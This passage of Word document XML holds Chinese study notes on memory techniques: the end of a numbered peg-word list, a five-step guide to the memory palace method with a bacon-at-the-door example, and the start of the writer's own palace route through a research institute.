        </w:rPr>
        <w:t>八路军</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白旗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈巴狗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五粮液</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白玉酒瓶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姚明球衣</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  92</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脏网球</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破伞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  94</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破烂首饰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>救护车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>酒楼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破旗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>夜光杯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钻石</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>运用记忆宫殿法的五个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、选择你的宫殿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>首先和首要的，你需要选择一个你非常熟悉的地方。本技巧的有效性取决于你在脑海中轻易地再现这个地方并在其中漫步的能力。你必须仅仅用你精神的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>眼睛</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>就能身临其境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>举例，一个较好的初步选择可以是你的家。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请记住，你对这个地方的细节的再现越鲜明，你就能越有效地记忆。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>其次，试着在你的宫殿里</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>确定一条特别的路线</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>，而不只是再现静止的场景。也就是说，想象对你家做一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>详尽的巡视，而不只是简单地把你家图像化</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。就像我们将在下一步骤中看到的，这会大大增强本技巧的效果，如果你能按照确定的次序回想起物品的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>对记忆宫殿的选择，这里还有一些行之有效的推荐，以及可以采取的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:lastRenderedPageBreak/>
        <w:t>路线：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>你所在城市的熟悉的道路。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>可能的路线比如你开车上班经过的，或其他你熟悉的街道的顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>现在或者以前的学校</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。你可以想象从教室到图书馆的道路（或者是去街对面的酒吧，如果那让你铭记于心的话）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>工作场所</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。想象从你的隔间到咖啡机，或者到你老板的办公室（这不难选吧）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>风景</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。想象在附近一带散步或者你在公园里慢跑的路线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、列出明显的特征物</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>现在你需要注意所选场所里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>明显的特征物</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。举例，如果你选择巡视你的家，大门应该是第一个引起注意的特征物。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>继续在你的记忆宫殿里做虚拟漫步。进门之后，第一个房间里有什么？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>系统地分解这个房间（你可以确定一个标准程序，比如总是从左看到右）。什么是下一个引起你注意的特征物？可以是餐厅中间的桌子，或者是墙上的一张画。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>一边走一边继续在头脑中记录其他的特征物。它们中的每一个都将成为一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>记忆槽</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>，等下你就可以用来储存一个特定的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、把宫殿牢牢印在脑中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>要让这个方法有效，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46630">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>最重要的就是要让这个地方或者路线百分之百地印在你的头脑中</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。尽你所能去记住它。如果你是擅长形象思维的人，这应该不难。如果不是，这里有一些能帮上忙的窍门：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>按照路线亲身走上一遍，当你看见那些明显的特征物时，大声地重复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:lastRenderedPageBreak/>
        <w:t>在纸上写下选择的特征物，在脑中巡视它们，并大声重复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>总是从同样的视角观看那些特征物。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>得明白形象思维是一种技能。如果你仍然感到困难，你可能要先去提高你的形象思维能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>当你相信你已经成功了，再反复几次。对你的记忆宫殿来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>大量练习</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>你的路线是非常重要的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>只要你自信已将路线深深印在你的头脑中，你就算准备好了。你已经拥有你的宫殿，它将可以反复用于记住任何你要记住的东西。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>联系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>现在你是你宫殿的主人，可以好好利用它了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>就像大部分的记忆增强方式一样，记忆宫殿法通过形象化的联想起作用。过程很简单：你选择一个已知的图像</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>称为记忆挂钩</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>和你想记住的要素结合起来。对我们来说，一个记忆挂钩就是我们记忆宫殿里的一个明显的特征物。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>记忆挂钩方法就是</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>改善记忆：讲你大脑的语言</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>这篇文章里描述的方法，如果你还没看过它，强烈推荐。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>根据那篇文章的描述，形象化联想的正确方式是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>疯狂的、滑稽的、讨厌的、不同寻常的、超凡脱俗的、生动的、荒谬的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>总之，就是那些容易被记住的东西，不是吗？把场景营造得独一无二，在真实生活中永远不会发生。唯一的规则：</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>乏味就是错</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>虽然这个技巧能记住大量信息，先让我们从简单的开始：用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>家</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>这个记忆宫殿来记购物清单。假设清单上的第一项是</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>腌肉</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="004D09DD" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7883">
        <w:t>让思维送你去你的记忆宫殿。你</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>在头脑中看见的第一个特征物是你家</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的大门。现在，用一种滑稽的方法，把</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>腌肉</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和你家大门的样子形象化地结合起来。比如想象巨大的腌肉条像</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>级片的僵尸一样从门下涌出来伸向你的腿，这样如何？去感受</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>腌肉手</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>在你腿上的触感。去感受那该死的邪恶的腌肉味。这够让人印象深刻吧？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>现在打开门，沿着你已经确定的那条路线继续走。看到的下一个特征物，把它和要记忆的下一项联系起来。</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>比如下一项是</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>蛋</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，而第二个特征物是</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>丈母娘的照片</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D09DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。很好，在这点上你知道该怎么做</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>……</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>程序都是一样的，只要保持头脑中的画面联想，直到搞定所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:t>要记的项目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7883">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、参观你的宫殿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>到这一个步骤，你已经记住了那些项目。但如果你是个新手，你可能还需要做一点复习，至少要把行程在头脑中演练过一次。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>如果你从同样的地方开始并遵循同样的路线，每当你看到途中选定的特征物时，要记的东西就会瞬间浮现。路线从出发到结束，注意那些特征物，并且在脑中重演场景。当你的行程终结，转过身从反方向走回你的出发点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="005A7883" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r w:rsidRPr="005A7883">
        <w:t>最后就完全是增强形象思维能力的问题了。你越放松就这事越容易，你就能记得越好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>自己的宫殿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00EF729E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中科院遥感所</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>班车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>京东三轮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电动栅栏门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>星空球</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遥感所楼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
